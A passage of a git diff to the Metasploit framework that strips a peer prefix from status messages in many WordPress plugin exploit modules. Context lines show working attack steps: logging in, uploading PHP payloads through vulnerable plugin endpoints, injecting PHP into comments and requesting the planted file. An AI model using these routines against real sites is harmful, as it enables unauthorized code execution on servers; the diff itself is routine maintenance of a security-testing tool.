#{payload_uri}...") + print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 9f07c15816..06b6f4b909 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -76,20 +76,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Trying to login as #{username}") + vprint_status("Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? - vprint_status("#{peer} - Trying to get nonce") + vprint_status("Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? - vprint_status("#{peer} - Trying to upload payload") + vprint_status("Trying to upload payload") # This must be default.php filename = 'default.php' - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file") + print_status("Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index 9d0cbd7ce6..dc6b8ca785 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php'), @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'assets', 'temp', payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index f09d836152..f86704f106 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /files|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index 3504f81df9..ced2ed7f8c 100644 --- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"") - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'post.php'), @@ -61,14 +61,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/ uploaded_filename = res.body register_files_for_cleanup(uploaded_filename) - print_status("#{peer} - File #{uploaded_filename} successfully uploaded") + print_status("File #{uploaded_filename} successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - Error on uploading file") end file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename) - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( { 'uri' => file_path, diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 9d554ee3e2..39b948f6d9 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -111,29 +111,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication - vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication + vprint_status("WordPress authentication attack is enabled") if use_wordpress_authentication + vprint_status("EC authentication attack is enabled") if use_ec_authentication if use_wordpress_authentication && use_ec_authentication - print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") + print_status("Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") end if use_wordpress_authentication - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) if !cookie if use_ec_authentication - print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") + print_warning("Failed to authenticate with WordPress, attempting upload with EC password next...") else fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') end else - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") end end - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) date_hash = Rex::Text.md5(Time.now.to_s) uploaded_filename = "#{payload_name}_#{date_hash}.php" @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => uploader_url, @@ -152,9 +152,9 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? - vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_error("Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") register_files_for_cleanup(uploaded_filename) res = send_request_cgi( { @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if !res.nil? && res.code == 404 - print_error("#{peer} - Failed to upload the payload") + print_error("Failed to upload the payload") else - print_good("#{peer} - Executed payload") + print_good("Executed payload") end end end diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 1fefb811ca..10b9d39bbd 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") - print_status("#{peer} - Sending PHP payload") + print_status("Sending PHP payload") res = send_request_cgi( 'method' => 'POST', @@ -67,19 +67,19 @@ class Metasploit3 < Msf::Exploit::Remote ) if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end filename = "#{Regexp.last_match[1]}.php" - print_good("#{peer} - Our payload is at: #{filename}. Calling payload...") + print_good("Our payload is at: #{filename}. Calling payload...") register_files_for_cleanup(filename) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) ) - print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 + print_error("Server returned #{res.code}") if res && res.code != 200 end end diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index 1fb64e7e7c..525d1dfce9 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -46,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(5)}.php" - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'), @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") }, 5 diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 50f0daf8e2..4ae974b7a5 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -64,11 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index f06a853ea6..cacccd0f7d 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body.include?(php_page_name) - print_good("#{peer} - Our payload is at: #{php_page_name}.") + print_good("Our payload is at: #{php_page_name}.") register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not answer') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 6338d3ed78..99deba5747 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -66,13 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end - print_status("#{peer} - Calling payload ...") + print_status("Calling payload ...") send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 806e529145..485c58a950 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue JSON::ParserError fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename') end - print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...") + print_good("Our payload is at: #{new_php_pagename}. Calling payload...") register_files_for_cleanup(new_php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown,'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index a0a6ac4c0e..2fc0fe33ca 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) #get upload filepath - print_status("#{peer} - Getting the upload path...") + print_status("Getting the upload path...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"") post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"") - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") n_data = post_data.to_s @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to upload payload") end - print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...") + print_good("Payload uploaded successfully. Disclosing the payload path...") #get path to payload res = send_request_cgi({ 'method' => 'GET', @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(File::basename(u.path)) - print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...") + print_good("Our payload is at: #{u.path}! Executing payload...") send_request_cgi({ 'method' => 'GET', 'uri' => u.path diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 765e103f5a..cbc7e40b53 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) data = generate_mime_message(payload, payload_name) upload_dir = "#{Rex::Text.rand_text_alpha(5)}/" - print_status("#{peer} - Uploading payload to #{upload_dir}...") + print_status("Uploading payload to #{upload_dir}...") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") begin json = JSON.parse(res.body) if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil? @@ -105,17 +105,17 @@ class Metasploit3 < Msf::Exploit::Remote uploaded_name = json['files'][0]['name'][0..-5] php_file_name = "#{uploaded_name}.php" payload_url = normalize_uri(wordpress_url_backend, upload_dir, uploaded_name, php_file_name) - print_good("#{peer} - Parsed response") + print_good("Parsed response") register_files_for_cleanup(php_file_name) register_files_for_cleanup("../#{uploaded_name}.zip") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") end rescue fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 48bc1b3f85..00226d4e6b 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be WordPress site") end - print_status("#{peer} - Starting up web service...") + print_status("Starting up web service...") start_service payload_uri = generate_payload_uri - vprint_status("#{peer} - Using URI #{payload_uri}") + vprint_status("Using URI #{payload_uri}") random_file_name = rand_text_alphanumeric(rand(5) + 5) post = { @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" } - print_status("#{peer} - Uploading payload #{random_file_name}...") + print_status("Uploading payload #{random_file_name}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") datastore['TRIES'].times do |i| payload_name = "#{random_file_name}_#{server_epoch_time + i}.php" res = call_payload(payload_name) @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = wordpress_and_online? unless res - vprint_error("#{peer} - It doesn't look like a WordPress site") + vprint_error("It doesn't look like a WordPress site") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 18118ed20c..2321cede00 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('pagelines', nil, nil, 'form-data; name="page"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_admin_post, diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 567ac81937..3e83952a77 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => request_uri, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote upload_uri = normalize_uri(res.body) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 363b9441a4..564aaead50 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /success|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 6ae240b2d9..5e229750e1 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -77,8 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) - print_good("#{peer} - Our payload is at: #{final_uri}") - print_status("#{peer} - Calling payload...") + print_good("Our payload is at: #{final_uri}") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index b1f4e67ad4..830cb7cea6 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -60,14 +60,14 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) ) diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index f683aa071f..6b7a2c30b9 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload") + print_status("Preparing payload") unique_name = Rex::Text.rand_text_alpha(10) payload_name = "#{unique_name}.php" symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data = generate_mime_message(payload, payload_name, unique_name, symposium_url) symposium_url = normalize_uri(symposium_url, 'index.php') - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => symposium_url, @@ -74,22 +74,22 @@ class Metasploit3 < Msf::Exploit::Remote ) if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") else if res.nil? fail_with(Failure::Unreachable, "No response from the target") else - vprint_error("#{peer} - HTTP Status: #{res.code}") - vprint_error("#{peer} - Server returned: #{res.body}") + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index a38a65f0f1..bcf6911d2b 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb @@ -106,44 +106,44 @@ class Metasploit3 < Msf::Exploit::Remote @auth = require_auth? if @auth - print_status("#{peer} - Trying to login...") + print_status("Trying to login...") @cookie = wordpress_login(@user, @password) if @cookie.nil? fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful") end - print_status("#{peer} - login successful") + print_status("login successful") else - print_status("#{peer} - Trying unauthenticated exploitation...") + print_status("Trying unauthenticated exploitation...") end if datastore['POSTID'] and datastore['POSTID'] != 0 @post_id = datastore['POSTID'] - print_status("#{peer} - Using the user supplied POST ID #{@post_id}...") + print_status("Using the user supplied POST ID #{@post_id}...") else - print_status("#{peer} - Trying to get posts from feed...") + print_status("Trying to get posts from feed...") all_posts = wordpress_get_all_blog_posts_via_feed # First try all blog posts provided by feed if all_posts all_posts.each do |p| - vprint_status("#{peer} - Checking #{p}...") + vprint_status("Checking #{p}...") enabled = wordpress_post_comments_enabled?(p, @cookie) @post_id = get_post_id_from_body(enabled) if @post_id - print_status("#{peer} - Found Post POST ID #{@post_id}...") + print_status("Found Post POST ID #{@post_id}...") break end end end # if nothing found, bruteforce a post id unless @post_id - print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...") + print_status("Nothing found. Trying to brute force a valid POST ID...") min_post_id = datastore['MIN_POST_ID'] max_post_id = datastore['MAX_POST_ID'] @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie) if @post_id.nil? fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment") else - print_status("#{peer} - Using the brute forced POST ID #{@post_id}...") + print_status("Using the brute forced POST ID #{@post_id}...") end end end @@ -151,14 +151,14 @@ class Metasploit3 < Msf::Exploit::Remote random_test = rand_text_alpha(64) @sum = Rex::Text.sha1(random_test) - print_status("#{peer} - Injecting the PHP Code in a comment...") + print_status("Injecting the PHP Code in a comment...") text = Rex::Text::rand_text_alpha(10) post_uri = post_comment(text) if post_uri.nil? fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned") end - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") options = { 'method' => 'GET', 'uri' => post_uri, diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index cba67e8185..ff0f1b3644 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index d51f8957e1..f4cd2947c3 100644 --- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /#{php_page_name}/ - print_good("#{peer} - Payload uploaded as #{php_page_name}") + print_good("Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) 